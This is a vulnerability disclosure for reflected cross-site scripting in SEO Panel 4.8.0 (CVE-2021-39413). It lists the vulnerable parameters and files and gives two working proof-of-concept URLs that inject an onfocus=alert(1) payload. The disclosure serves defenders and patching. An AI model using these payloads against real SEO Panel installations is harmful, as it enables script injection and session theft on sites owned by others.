Cross site scripting in SEO Panel v4.8.0

Multiple cross-site scripting vulnerabilities are present in SEO Panel 4.8.0. The following is detailed information about these vulnerabilities:

file: backlinks.php
line: 82
parameter: to_time
exploit: http://localhost/Seo-Panel/backlinks.php?fromPopUp=1&from_time=2021-03-02&rep=1&sec=reports&to_time=2021-03-17%22autofocus%20onfocus=alert(1)%20//%22&website_id=1

Similar vulnerabilities are found in other PHP files through to_time: analytics.php, log.php, overview.php, pagespeed.php, rank.php, review.php, saturationchecker.php, social_media.php, reports.php.

The following parameters are vulnerable in similar way in corresponding files:

Parameter: from_time

Files: backlinks.php, analytics.php, log.php, overview.php, pagespeed.php, rank.php, review.php, saturationchecker.php, social_media.php, webmaster-tools.php, reports.php

file: analytics.php
line: 45
parameter: order_col
exploit: http://localhost/Seo-Panel/analytics.php?from_time=2021-03-18&order_col=url%22autofocus%20onfocus=alert(1)%20//%22&order_val=DESC&report_type=1&search_name=&sec=viewAnalyticsSummary&to_time=2021-03-19&type=&website_id=http://www.example.com

Parameter: order_col

Files: analytics.php, review.php, social_media.php, webmaster-tools.php

Parameter: pageno

Files: alerts.php, log.php, keywords.php, proxy.php, searchengine.php, siteauditor.php

Above vulnerabilities are published at CVE-2021-39413

This vulnerability was detected as part of the DARPA CHESS program